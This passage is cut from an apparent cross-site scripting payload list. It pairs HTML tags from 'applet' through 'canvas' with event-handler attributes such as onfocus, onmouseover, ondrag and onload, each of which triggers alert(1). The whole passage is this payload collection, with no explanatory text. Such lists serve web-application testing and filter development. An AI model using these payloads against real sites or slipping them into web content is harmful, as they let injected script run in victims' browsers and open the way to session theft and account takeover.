onfocusin=alert(1)></applet> +<applet onbeforecopy="alert(1)" contenteditable>test</applet> +<applet onbeforecut="alert(1)" contenteditable>test</applet> +<applet onbeforepaste="alert(1)" contenteditable>test</applet> +<applet onblur=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onclick="alert(1)">test</applet> +<applet oncontextmenu="alert(1)">test</applet> +<applet oncopy="alert(1)" contenteditable>test</applet> +<applet oncut="alert(1)" contenteditable>test</applet> +<applet ondblclick="alert(1)">test</applet> +<applet onfocusout=alert(1) tabindex=1 id=x></applet><input autofocus> +<applet onkeydown="alert(1)" contenteditable>test</applet> +<applet onkeypress="alert(1)" contenteditable>test</applet> +<applet onkeyup="alert(1)" contenteditable>test</applet> +<applet onmousedown="alert(1)">test</applet> +<applet onmouseenter="alert(1)">test</applet> +<applet onmouseleave="alert(1)">test</applet> +<applet onmousemove="alert(1)">test</applet> +<applet onmouseout="alert(1)">test</applet> +<applet onmouseover="alert(1)">test</applet> +<applet onmouseup="alert(1)">test</applet> +<applet onpaste="alert(1)" contenteditable>test</applet> +<applet onreadystatechange=alert(1)></applet> +<area draggable="true" ondrag="alert(1)">test</area> +<area draggable="true" ondragend="alert(1)">test</area> +<area draggable="true" ondragenter="alert(1)">test</area> +<area draggable="true" ondragleave="alert(1)">test</area> +<area draggable="true" ondragstart="alert(1)">test</area> +<area id=x tabindex=1 onactivate=alert(1)></area> +<area id=x tabindex=1 onbeforeactivate=alert(1)></area> +<area id=x tabindex=1 onbeforedeactivate=alert(1)></area><input autofocus> +<area id=x tabindex=1 ondeactivate=alert(1)></area><input id=y autofocus> +<area onbeforecopy="alert(1)" contenteditable>test</area> +<area onbeforecut="alert(1)" contenteditable>test</area> +<area onbeforepaste="alert(1)" contenteditable>test</area> +<area onblur=alert(1) tabindex=1 id=x></area><input autofocus> +<area onclick="alert(1)">test</area> +<area oncontextmenu="alert(1)">test</area> +<area oncopy="alert(1)" contenteditable>test</area> +<area oncut="alert(1)" contenteditable>test</area> +<area ondblclick="alert(1)">test</area> +<area onfocusout=alert(1) tabindex=1 id=x></area><input autofocus> +<area onkeydown="alert(1)" contenteditable>test</area> +<area onkeypress="alert(1)" contenteditable>test</area> +<area onkeyup="alert(1)" contenteditable>test</area> +<area onmousedown="alert(1)">test</area> +<area onmouseenter="alert(1)">test</area> +<area onmouseleave="alert(1)">test</area> +<area onmousemove="alert(1)">test</area> +<area onmouseout="alert(1)">test</area> +<area onmouseover="alert(1)">test</area> +<area onmouseup="alert(1)">test</area> +<area onpaste="alert(1)" contenteditable>test</area> +<article draggable="true" ondrag="alert(1)">test</article> +<article draggable="true" ondragend="alert(1)">test</article> +<article draggable="true" ondragenter="alert(1)">test</article> +<article draggable="true" ondragleave="alert(1)">test</article> +<article draggable="true" ondragstart="alert(1)">test</article> +<article id=x tabindex=1 onactivate=alert(1)></article> +<article id=x tabindex=1 onbeforeactivate=alert(1)></article> +<article id=x tabindex=1 onbeforedeactivate=alert(1)></article><input autofocus> +<article id=x tabindex=1 ondeactivate=alert(1)></article><input id=y autofocus> +<article id=x tabindex=1 onfocus=alert(1)></article> +<article id=x tabindex=1 onfocusin=alert(1)></article> +<article onbeforecopy="alert(1)" contenteditable>test</article> +<article onbeforecut="alert(1)" contenteditable>test</article> +<article onbeforepaste="alert(1)" contenteditable>test</article> +<article onblur=alert(1) tabindex=1 id=x></article><input autofocus> +<article onclick="alert(1)">test</article> +<article oncontextmenu="alert(1)">test</article> +<article oncopy="alert(1)" contenteditable>test</article> +<article oncut="alert(1)" contenteditable>test</article> +<article ondblclick="alert(1)">test</article> +<article onfocusout=alert(1) tabindex=1 id=x></article><input autofocus> +<article onkeydown="alert(1)" contenteditable>test</article> +<article onkeypress="alert(1)" contenteditable>test</article> +<article onkeyup="alert(1)" contenteditable>test</article> +<article onmousedown="alert(1)">test</article> +<article onmouseenter="alert(1)">test</article> +<article onmouseleave="alert(1)">test</article> +<article onmousemove="alert(1)">test</article> +<article onmouseout="alert(1)">test</article> +<article onmouseover="alert(1)">test</article> +<article onmouseup="alert(1)">test</article> +<article onpaste="alert(1)" contenteditable>test</article> +<aside draggable="true" ondrag="alert(1)">test</aside> +<aside draggable="true" ondragend="alert(1)">test</aside> +<aside draggable="true" ondragenter="alert(1)">test</aside> +<aside draggable="true" ondragleave="alert(1)">test</aside> +<aside draggable="true" ondragstart="alert(1)">test</aside> +<aside id=x tabindex=1 onactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforeactivate=alert(1)></aside> +<aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus> +<aside id=x tabindex=1 ondeactivate=alert(1)></aside><input id=y autofocus> +<aside id=x tabindex=1 onfocus=alert(1)></aside> +<aside id=x tabindex=1 onfocusin=alert(1)></aside> +<aside onbeforecopy="alert(1)" contenteditable>test</aside> +<aside onbeforecut="alert(1)" contenteditable>test</aside> +<aside onbeforepaste="alert(1)" contenteditable>test</aside> +<aside onblur=alert(1) tabindex=1 id=x></aside><input autofocus> +<aside onclick="alert(1)">test</aside> +<aside oncontextmenu="alert(1)">test</aside> +<aside oncopy="alert(1)" contenteditable>test</aside> +<aside oncut="alert(1)" contenteditable>test</aside> +<aside ondblclick="alert(1)">test</aside> +<aside onfocusout=alert(1) tabindex=1 id=x></aside><input autofocus> +<aside onkeydown="alert(1)" contenteditable>test</aside> +<aside onkeypress="alert(1)" contenteditable>test</aside> +<aside onkeyup="alert(1)" contenteditable>test</aside> +<aside onmousedown="alert(1)">test</aside> +<aside onmouseenter="alert(1)">test</aside> +<aside onmouseleave="alert(1)">test</aside> +<aside onmousemove="alert(1)">test</aside> +<aside onmouseout="alert(1)">test</aside> +<aside onmouseover="alert(1)">test</aside> +<aside onmouseup="alert(1)">test</aside> +<aside onpaste="alert(1)" contenteditable>test</aside> +<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio autoplay onplaying=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay onended=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio controls autoplay ontimeupdate=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio draggable="true" ondrag="alert(1)">test</audio> +<audio draggable="true" ondragend="alert(1)">test</audio> +<audio draggable="true" ondragenter="alert(1)">test</audio> +<audio draggable="true" ondragleave="alert(1)">test</audio> +<audio draggable="true" ondragstart="alert(1)">test</audio> +<audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x controls onfocusin=alert(1) id=x><source src="validaudio.wav"></audio> +<audio id=x tabindex=1 onactivate=alert(1)></audio> +<audio id=x tabindex=1 onbeforeactivate=alert(1)></audio> +<audio id=x tabindex=1 onbeforedeactivate=alert(1)></audio><input autofocus> +<audio id=x tabindex=1 ondeactivate=alert(1)></audio><input id=y autofocus> +<audio onbeforecopy="alert(1)" contenteditable>test</audio> +<audio onbeforecut="alert(1)" contenteditable>test</audio> +<audio onbeforepaste="alert(1)" contenteditable>test</audio> +<audio onblur=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onclick="alert(1)">test</audio> +<audio oncontextmenu="alert(1)">test</audio> +<audio oncopy="alert(1)" contenteditable>test</audio> +<audio oncut="alert(1)" contenteditable>test</audio> +<audio ondblclick="alert(1)">test</audio> +<audio onfocusout=alert(1) tabindex=1 id=x></audio><input autofocus> +<audio onkeydown="alert(1)" contenteditable>test</audio> +<audio onkeypress="alert(1)" contenteditable>test</audio> +<audio onkeyup="alert(1)" contenteditable>test</audio> +<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio> +<audio onmousedown="alert(1)">test</audio> +<audio onmouseenter="alert(1)">test</audio> +<audio onmouseleave="alert(1)">test</audio> +<audio onmousemove="alert(1)">test</audio> +<audio onmouseout="alert(1)">test</audio> +<audio onmouseover="alert(1)">test</audio> +<audio onmouseup="alert(1)">test</audio> +<audio onpaste="alert(1)" contenteditable>test</audio> +<audio src/onerror=alert(1)> +<b draggable="true" ondrag="alert(1)">test</b> +<b draggable="true" ondragend="alert(1)">test</b> +<b draggable="true" ondragenter="alert(1)">test</b> +<b draggable="true" ondragleave="alert(1)">test</b> +<b draggable="true" ondragstart="alert(1)">test</b> +<b id=x tabindex=1 onactivate=alert(1)></b> +<b id=x tabindex=1 onbeforeactivate=alert(1)></b> +<b id=x tabindex=1 onbeforedeactivate=alert(1)></b><input autofocus> +<b id=x tabindex=1 ondeactivate=alert(1)></b><input id=y autofocus> +<b id=x tabindex=1 onfocus=alert(1)></b> +<b id=x tabindex=1 onfocusin=alert(1)></b> +<b onbeforecopy="alert(1)" contenteditable>test</b> +<b onbeforecut="alert(1)" contenteditable>test</b> +<b onbeforepaste="alert(1)" contenteditable>test</b> +<b onblur=alert(1) tabindex=1 id=x></b><input autofocus> +<b onclick="alert(1)">test</b> +<b oncontextmenu="alert(1)">test</b> +<b oncopy="alert(1)" contenteditable>test</b> +<b oncut="alert(1)" contenteditable>test</b> +<b ondblclick="alert(1)">test</b> +<b onfocusout=alert(1) tabindex=1 id=x></b><input autofocus> +<b onkeydown="alert(1)" contenteditable>test</b> +<b onkeypress="alert(1)" contenteditable>test</b> +<b onkeyup="alert(1)" contenteditable>test</b> +<b onmousedown="alert(1)">test</b> +<b onmouseenter="alert(1)">test</b> +<b onmouseleave="alert(1)">test</b> +<b onmousemove="alert(1)">test</b> +<b onmouseout="alert(1)">test</b> +<b onmouseover="alert(1)">test</b> +<b onmouseup="alert(1)">test</b> +<b onpaste="alert(1)" contenteditable>test</b> +<base draggable="true" ondrag="alert(1)">test</base> +<base draggable="true" ondragend="alert(1)">test</base> +<base draggable="true" ondragenter="alert(1)">test</base> +<base draggable="true" ondragleave="alert(1)">test</base> +<base draggable="true" ondragstart="alert(1)">test</base> +<base id=x tabindex=1 onactivate=alert(1)></base> +<base id=x tabindex=1 onbeforeactivate=alert(1)></base> +<base id=x tabindex=1 onbeforedeactivate=alert(1)></base><input autofocus> +<base id=x tabindex=1 ondeactivate=alert(1)></base><input id=y autofocus> +<base id=x tabindex=1 onfocus=alert(1)></base> +<base id=x tabindex=1 onfocusin=alert(1)></base> +<base onbeforecopy="alert(1)" contenteditable>test</base> +<base onbeforecut="alert(1)" contenteditable>test</base> +<base onbeforepaste="alert(1)" contenteditable>test</base> +<base onblur=alert(1) tabindex=1 id=x></base><input autofocus> +<base onclick="alert(1)">test</base> +<base oncontextmenu="alert(1)">test</base> +<base oncopy="alert(1)" contenteditable>test</base> +<base oncut="alert(1)" contenteditable>test</base> +<base ondblclick="alert(1)">test</base> +<base onfocusout=alert(1) tabindex=1 id=x></base><input autofocus> +<base onkeydown="alert(1)" contenteditable>test</base> +<base onkeypress="alert(1)" contenteditable>test</base> +<base onkeyup="alert(1)" contenteditable>test</base> +<base onmousedown="alert(1)">test</base> +<base onmouseenter="alert(1)">test</base> +<base onmouseleave="alert(1)">test</base> +<base onmousemove="alert(1)">test</base> +<base onmouseout="alert(1)">test</base> +<base onmouseover="alert(1)">test</base> +<base onmouseup="alert(1)">test</base> +<base onpaste="alert(1)" contenteditable>test</base> +<basefont draggable="true" ondrag="alert(1)">test</basefont> +<basefont draggable="true" ondragend="alert(1)">test</basefont> +<basefont draggable="true" ondragenter="alert(1)">test</basefont> +<basefont draggable="true" ondragleave="alert(1)">test</basefont> +<basefont draggable="true" ondragstart="alert(1)">test</basefont> +<basefont id=x tabindex=1 onactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforeactivate=alert(1)></basefont> +<basefont id=x tabindex=1 onbeforedeactivate=alert(1)></basefont><input autofocus> +<basefont id=x tabindex=1 ondeactivate=alert(1)></basefont><input id=y autofocus> +<basefont id=x tabindex=1 onfocus=alert(1)></basefont> +<basefont id=x tabindex=1 onfocusin=alert(1)></basefont> +<basefont onbeforecopy="alert(1)" contenteditable>test</basefont> +<basefont onbeforecut="alert(1)" contenteditable>test</basefont> +<basefont onbeforepaste="alert(1)" contenteditable>test</basefont> +<basefont onblur=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onclick="alert(1)">test</basefont> +<basefont oncontextmenu="alert(1)">test</basefont> +<basefont oncopy="alert(1)" contenteditable>test</basefont> +<basefont oncut="alert(1)" contenteditable>test</basefont> +<basefont ondblclick="alert(1)">test</basefont> +<basefont onfocusout=alert(1) tabindex=1 id=x></basefont><input autofocus> +<basefont onkeydown="alert(1)" contenteditable>test</basefont> +<basefont onkeypress="alert(1)" contenteditable>test</basefont> +<basefont onkeyup="alert(1)" contenteditable>test</basefont> +<basefont onmousedown="alert(1)">test</basefont> +<basefont onmouseenter="alert(1)">test</basefont> +<basefont onmouseleave="alert(1)">test</basefont> +<basefont onmousemove="alert(1)">test</basefont> +<basefont onmouseout="alert(1)">test</basefont> +<basefont onmouseover="alert(1)">test</basefont> +<basefont onmouseup="alert(1)">test</basefont> +<basefont onpaste="alert(1)" contenteditable>test</basefont> +<bdi draggable="true" ondrag="alert(1)">test</bdi> +<bdi draggable="true" ondragend="alert(1)">test</bdi> +<bdi draggable="true" ondragenter="alert(1)">test</bdi> +<bdi draggable="true" ondragleave="alert(1)">test</bdi> +<bdi draggable="true" ondragstart="alert(1)">test</bdi> +<bdi id=x tabindex=1 onactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforeactivate=alert(1)></bdi> +<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus> +<bdi id=x tabindex=1 ondeactivate=alert(1)></bdi><input id=y autofocus> +<bdi id=x tabindex=1 onfocus=alert(1)></bdi> +<bdi id=x tabindex=1 onfocusin=alert(1)></bdi> +<bdi onbeforecopy="alert(1)" contenteditable>test</bdi> +<bdi onbeforecut="alert(1)" contenteditable>test</bdi> +<bdi onbeforepaste="alert(1)" contenteditable>test</bdi> +<bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onclick="alert(1)">test</bdi> +<bdi oncontextmenu="alert(1)">test</bdi> +<bdi oncopy="alert(1)" contenteditable>test</bdi> +<bdi oncut="alert(1)" contenteditable>test</bdi> +<bdi ondblclick="alert(1)">test</bdi> +<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><input autofocus> +<bdi onkeydown="alert(1)" contenteditable>test</bdi> +<bdi onkeypress="alert(1)" contenteditable>test</bdi> +<bdi onkeyup="alert(1)" contenteditable>test</bdi> +<bdi onmousedown="alert(1)">test</bdi> +<bdi onmouseenter="alert(1)">test</bdi> +<bdi onmouseleave="alert(1)">test</bdi> +<bdi onmousemove="alert(1)">test</bdi> +<bdi onmouseout="alert(1)">test</bdi> +<bdi onmouseover="alert(1)">test</bdi> +<bdi onmouseup="alert(1)">test</bdi> +<bdi onpaste="alert(1)" contenteditable>test</bdi> +<bdo draggable="true" ondrag="alert(1)">test</bdo> +<bdo draggable="true" ondragend="alert(1)">test</bdo> +<bdo draggable="true" ondragenter="alert(1)">test</bdo> +<bdo draggable="true" ondragleave="alert(1)">test</bdo> +<bdo draggable="true" ondragstart="alert(1)">test</bdo> +<bdo id=x tabindex=1 onactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforeactivate=alert(1)></bdo> +<bdo id=x tabindex=1 onbeforedeactivate=alert(1)></bdo><input autofocus> +<bdo id=x tabindex=1 ondeactivate=alert(1)></bdo><input id=y autofocus> +<bdo id=x tabindex=1 onfocus=alert(1)></bdo> +<bdo id=x tabindex=1 onfocusin=alert(1)></bdo> +<bdo onbeforecopy="alert(1)" contenteditable>test</bdo> +<bdo onbeforecut="alert(1)" contenteditable>test</bdo> +<bdo onbeforepaste="alert(1)" contenteditable>test</bdo> +<bdo onblur=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onclick="alert(1)">test</bdo> +<bdo oncontextmenu="alert(1)">test</bdo> +<bdo oncopy="alert(1)" contenteditable>test</bdo> +<bdo oncut="alert(1)" contenteditable>test</bdo> +<bdo ondblclick="alert(1)">test</bdo> +<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><input autofocus> +<bdo onkeydown="alert(1)" contenteditable>test</bdo> +<bdo onkeypress="alert(1)" contenteditable>test</bdo> +<bdo onkeyup="alert(1)" contenteditable>test</bdo> +<bdo onmousedown="alert(1)">test</bdo> +<bdo onmouseenter="alert(1)">test</bdo> +<bdo onmouseleave="alert(1)">test</bdo> +<bdo onmousemove="alert(1)">test</bdo> +<bdo onmouseout="alert(1)">test</bdo> +<bdo onmouseover="alert(1)">test</bdo> +<bdo onmouseup="alert(1)">test</bdo> +<bdo onpaste="alert(1)" contenteditable>test</bdo> +<bgsound draggable="true" ondrag="alert(1)">test</bgsound> +<bgsound draggable="true" ondragend="alert(1)">test</bgsound> +<bgsound draggable="true" ondragenter="alert(1)">test</bgsound> +<bgsound draggable="true" ondragleave="alert(1)">test</bgsound> +<bgsound draggable="true" ondragstart="alert(1)">test</bgsound> +<bgsound id=x tabindex=1 onactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforeactivate=alert(1)></bgsound> +<bgsound id=x tabindex=1 onbeforedeactivate=alert(1)></bgsound><input autofocus> +<bgsound id=x tabindex=1 ondeactivate=alert(1)></bgsound><input id=y autofocus> +<bgsound id=x tabindex=1 onfocus=alert(1)></bgsound> +<bgsound id=x tabindex=1 onfocusin=alert(1)></bgsound> +<bgsound onbeforecopy="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforecut="alert(1)" contenteditable>test</bgsound> +<bgsound onbeforepaste="alert(1)" contenteditable>test</bgsound> +<bgsound onblur=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onclick="alert(1)">test</bgsound> +<bgsound oncontextmenu="alert(1)">test</bgsound> +<bgsound oncopy="alert(1)" contenteditable>test</bgsound> +<bgsound oncut="alert(1)" contenteditable>test</bgsound> +<bgsound ondblclick="alert(1)">test</bgsound> +<bgsound onfocusout=alert(1) tabindex=1 id=x></bgsound><input autofocus> +<bgsound onkeydown="alert(1)" contenteditable>test</bgsound> +<bgsound onkeypress="alert(1)" contenteditable>test</bgsound> +<bgsound onkeyup="alert(1)" contenteditable>test</bgsound> +<bgsound onmousedown="alert(1)">test</bgsound> +<bgsound onmouseenter="alert(1)">test</bgsound> +<bgsound onmouseleave="alert(1)">test</bgsound> +<bgsound onmousemove="alert(1)">test</bgsound> +<bgsound onmouseout="alert(1)">test</bgsound> +<bgsound onmouseover="alert(1)">test</bgsound> +<bgsound onmouseup="alert(1)">test</bgsound> +<bgsound onpaste="alert(1)" contenteditable>test</bgsound> +<big draggable="true" ondrag="alert(1)">test</big> +<big draggable="true" ondragend="alert(1)">test</big> +<big draggable="true" ondragenter="alert(1)">test</big> +<big draggable="true" ondragleave="alert(1)">test</big> +<big draggable="true" ondragstart="alert(1)">test</big> +<big id=x tabindex=1 onactivate=alert(1)></big> +<big id=x tabindex=1 onbeforeactivate=alert(1)></big> +<big id=x tabindex=1 onbeforedeactivate=alert(1)></big><input autofocus> +<big id=x tabindex=1 ondeactivate=alert(1)></big><input id=y autofocus> +<big id=x tabindex=1 onfocus=alert(1)></big> +<big id=x tabindex=1 onfocusin=alert(1)></big> +<big onbeforecopy="alert(1)" contenteditable>test</big> +<big onbeforecut="alert(1)" contenteditable>test</big> +<big onbeforepaste="alert(1)" contenteditable>test</big> +<big onblur=alert(1) tabindex=1 id=x></big><input autofocus> +<big onclick="alert(1)">test</big> +<big oncontextmenu="alert(1)">test</big> +<big oncopy="alert(1)" contenteditable>test</big> +<big oncut="alert(1)" contenteditable>test</big> +<big ondblclick="alert(1)">test</big> +<big onfocusout=alert(1) tabindex=1 id=x></big><input autofocus> +<big onkeydown="alert(1)" contenteditable>test</big> +<big onkeypress="alert(1)" contenteditable>test</big> +<big onkeyup="alert(1)" contenteditable>test</big> +<big onmousedown="alert(1)">test</big> +<big onmouseenter="alert(1)">test</big> +<big onmouseleave="alert(1)">test</big> +<big onmousemove="alert(1)">test</big> +<big onmouseout="alert(1)">test</big> +<big onmouseover="alert(1)">test</big> +<big onmouseup="alert(1)">test</big> +<big onpaste="alert(1)" contenteditable>test</big> +<blink draggable="true" ondrag="alert(1)">test</blink> +<blink draggable="true" ondragend="alert(1)">test</blink> +<blink draggable="true" ondragenter="alert(1)">test</blink> +<blink draggable="true" ondragleave="alert(1)">test</blink> +<blink draggable="true" ondragstart="alert(1)">test</blink> +<blink id=x tabindex=1 onactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforeactivate=alert(1)></blink> +<blink id=x tabindex=1 onbeforedeactivate=alert(1)></blink><input autofocus> +<blink id=x tabindex=1 ondeactivate=alert(1)></blink><input id=y autofocus> +<blink id=x tabindex=1 onfocus=alert(1)></blink> +<blink id=x tabindex=1 onfocusin=alert(1)></blink> +<blink onbeforecopy="alert(1)" contenteditable>test</blink> +<blink onbeforecut="alert(1)" contenteditable>test</blink> +<blink onbeforepaste="alert(1)" contenteditable>test</blink> +<blink onblur=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onclick="alert(1)">test</blink> +<blink oncontextmenu="alert(1)">test</blink> +<blink oncopy="alert(1)" contenteditable>test</blink> +<blink oncut="alert(1)" contenteditable>test</blink> +<blink ondblclick="alert(1)">test</blink> +<blink onfocusout=alert(1) tabindex=1 id=x></blink><input autofocus> +<blink onkeydown="alert(1)" contenteditable>test</blink> +<blink onkeypress="alert(1)" contenteditable>test</blink> +<blink onkeyup="alert(1)" contenteditable>test</blink> +<blink onmousedown="alert(1)">test</blink> +<blink onmouseenter="alert(1)">test</blink> +<blink onmouseleave="alert(1)">test</blink> +<blink onmousemove="alert(1)">test</blink> +<blink onmouseout="alert(1)">test</blink> +<blink onmouseover="alert(1)">test</blink> +<blink onmouseup="alert(1)">test</blink> +<blink onpaste="alert(1)" contenteditable>test</blink> +<blockquote draggable="true" ondrag="alert(1)">test</blockquote> +<blockquote draggable="true" ondragend="alert(1)">test</blockquote> +<blockquote draggable="true" ondragenter="alert(1)">test</blockquote> +<blockquote draggable="true" ondragleave="alert(1)">test</blockquote> +<blockquote draggable="true" ondragstart="alert(1)">test</blockquote> +<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote> +<blockquote id=x tabindex=1 onbeforedeactivate=alert(1)></blockquote><input autofocus> +<blockquote id=x tabindex=1 ondeactivate=alert(1)></blockquote><input id=y autofocus> +<blockquote id=x tabindex=1 onfocus=alert(1)></blockquote> +<blockquote id=x tabindex=1 onfocusin=alert(1)></blockquote> +<blockquote onbeforecopy="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforecut="alert(1)" contenteditable>test</blockquote> +<blockquote onbeforepaste="alert(1)" contenteditable>test</blockquote> +<blockquote onblur=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onclick="alert(1)">test</blockquote> +<blockquote oncontextmenu="alert(1)">test</blockquote> +<blockquote oncopy="alert(1)" contenteditable>test</blockquote> +<blockquote oncut="alert(1)" contenteditable>test</blockquote> +<blockquote ondblclick="alert(1)">test</blockquote> +<blockquote onfocusout=alert(1) tabindex=1 id=x></blockquote><input autofocus> +<blockquote onkeydown="alert(1)" contenteditable>test</blockquote> +<blockquote onkeypress="alert(1)" contenteditable>test</blockquote> +<blockquote onkeyup="alert(1)" contenteditable>test</blockquote> +<blockquote onmousedown="alert(1)">test</blockquote> +<blockquote onmouseenter="alert(1)">test</blockquote> +<blockquote onmouseleave="alert(1)">test</blockquote> +<blockquote onmousemove="alert(1)">test</blockquote> +<blockquote onmouseout="alert(1)">test</blockquote> +<blockquote onmouseover="alert(1)">test</blockquote> +<blockquote onmouseup="alert(1)">test</blockquote> +<blockquote onpaste="alert(1)" contenteditable>test</blockquote> +<body draggable="true" ondrag="alert(1)">test</body> +<body draggable="true" ondragend="alert(1)">test</body> +<body draggable="true" ondragenter="alert(1)">test</body> +<body draggable="true" ondragleave="alert(1)">test</body> +<body draggable="true" ondragstart="alert(1)">test</body> +<body id=x tabindex=1 onactivate=alert(1)></body> +<body id=x tabindex=1 onbeforeactivate=alert(1)></body> +<body id=x tabindex=1 onbeforedeactivate=alert(1)></body><input autofocus> +<body id=x tabindex=1 ondeactivate=alert(1)></body><input id=y autofocus> +<body id=x tabindex=1 onfocus=alert(1)></body> +<body id=x tabindex=1 onfocusin=alert(1)></body> +<body onafterprint=alert(1)> +<body onbeforecopy="alert(1)" contenteditable>test</body> +<body onbeforecut="alert(1)" contenteditable>test</body> +<body onbeforepaste="alert(1)" contenteditable>test</body> +<body onbeforeprint=alert(1)> +<body onbeforeunload="location='javascript:alert(1)'"> +<body onblur=alert(1) id=x><iframe id=x> +<body onclick="alert(1)">test</body> +<body oncontextmenu="alert(1)">test</body> +<body oncopy="alert(1)" contenteditable>test</body> +<body oncut="alert(1)" contenteditable>test</body> +<body ondblclick="alert(1)">test</body> +<body onerror=alert(1) onload=/> +<body onfocusout=alert(1) id=x><iframe id=x> +<body onhashchange="alert(1)"> +<body onkeydown="alert(1)" contenteditable>test</body> +<body onkeypress="alert(1)" contenteditable>test</body> +<body onkeyup="alert(1)" contenteditable>test</body> +<body onload=alert(1)> +<body onmessage=alert(1)> +<body onmousedown="alert(1)">test</body> +<body onmouseenter="alert(1)">test</body> +<body onmouseleave="alert(1)">test</body> +<body onmousemove="alert(1)">test</body> +<body onmouseout="alert(1)">test</body> +<body onmouseover="alert(1)">test</body> +<body onmouseup="alert(1)">test</body> +<body onpageshow=alert(1)> +<body onpaste="alert(1)" contenteditable>test</body> +<body onpopstate=alert(1)> +<body onresize="alert(1)"> +<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div> +<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script> +<body onwheel=alert(1)> +<br draggable="true" ondrag="alert(1)">test</br> +<br draggable="true" ondragend="alert(1)">test</br> +<br draggable="true" ondragenter="alert(1)">test</br> +<br draggable="true" ondragleave="alert(1)">test</br> +<br draggable="true" ondragstart="alert(1)">test</br> +<br id=x tabindex=1 onactivate=alert(1)></br> +<br id=x tabindex=1 onbeforeactivate=alert(1)></br> +<br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus> +<br id=x tabindex=1 ondeactivate=alert(1)></br><input id=y autofocus> +<br id=x tabindex=1 onfocus=alert(1)></br> +<br id=x tabindex=1 onfocusin=alert(1)></br> +<br onbeforecopy="alert(1)" contenteditable>test</br> +<br onbeforecut="alert(1)" contenteditable>test</br> +<br onbeforepaste="alert(1)" contenteditable>test</br> +<br onblur=alert(1) tabindex=1 id=x></br><input autofocus> +<br onclick="alert(1)">test</br> +<br oncontextmenu="alert(1)">test</br> +<br oncopy="alert(1)" contenteditable>test</br> +<br oncut="alert(1)" contenteditable>test</br> +<br ondblclick="alert(1)">test</br> +<br onfocusout=alert(1) tabindex=1 id=x></br><input autofocus> +<br onkeydown="alert(1)" contenteditable>test</br> +<br onkeypress="alert(1)" contenteditable>test</br> +<br onkeyup="alert(1)" contenteditable>test</br> +<br onmousedown="alert(1)">test</br> +<br onmouseenter="alert(1)">test</br> +<br onmouseleave="alert(1)">test</br> +<br onmousemove="alert(1)">test</br> +<br onmouseout="alert(1)">test</br> +<br onmouseover="alert(1)">test</br> +<br onmouseup="alert(1)">test</br> +<br onpaste="alert(1)" contenteditable>test</br> +<button autofocus onfocus=alert(1)>test</button> +<button autofocus onfocusin=alert(1)>test</button> +<button draggable="true" ondrag="alert(1)">test</button> +<button draggable="true" ondragend="alert(1)">test</button> +<button draggable="true" ondragenter="alert(1)">test</button> +<button draggable="true" ondragleave="alert(1)">test</button> +<button draggable="true" ondragstart="alert(1)">test</button> +<button id=x tabindex=1 onactivate=alert(1)></button> +<button id=x tabindex=1 onbeforeactivate=alert(1)></button> +<button id=x tabindex=1 onbeforedeactivate=alert(1)></button><input autofocus> +<button id=x tabindex=1 ondeactivate=alert(1)></button><input id=y autofocus> +<button onbeforecopy="alert(1)" contenteditable>test</button> +<button onbeforecut="alert(1)" contenteditable>test</button> +<button onbeforepaste="alert(1)" contenteditable>test</button> +<button onblur=alert(1) id=x></button><input autofocus> +<button onclick="alert(1)">test</button> +<button oncontextmenu="alert(1)">test</button> +<button oncopy="alert(1)" contenteditable>test</button> +<button oncut="alert(1)" contenteditable>test</button> +<button ondblclick="alert(1)">test</button> +<button onfocusout=alert(1) id=x></button><input autofocus> +<button onkeydown="alert(1)" contenteditable>test</button> +<button onkeypress="alert(1)" contenteditable>test</button> +<button onkeyup="alert(1)" contenteditable>test</button> +<button onmousedown="alert(1)">test</button> +<button onmouseenter="alert(1)">test</button> +<button onmouseleave="alert(1)">test</button> +<button onmousemove="alert(1)">test</button> +<button onmouseout="alert(1)">test</button> +<button onmouseover="alert(1)">test</button> +<button onmouseup="alert(1)">test</button> +<button onpaste="alert(1)" contenteditable>test</button> +<canvas draggable="true" ondrag="alert(1)">test</canvas> +<canvas draggable="true" ondragend="alert(1)">test</canvas> +<canvas draggable="true" ondragenter="alert(1)">test</canvas> +<canvas draggable="true" ondragleave="alert(1)">test</canvas> +<canvas draggable="true" ondragstart="alert(1)">test</canvas> +<canvas id=x tabindex=1 onactivate=alert(1)></canvas> +<canvas id=x tabindex=1 onbeforeactivate=alert(1)></canvas> +<canvas 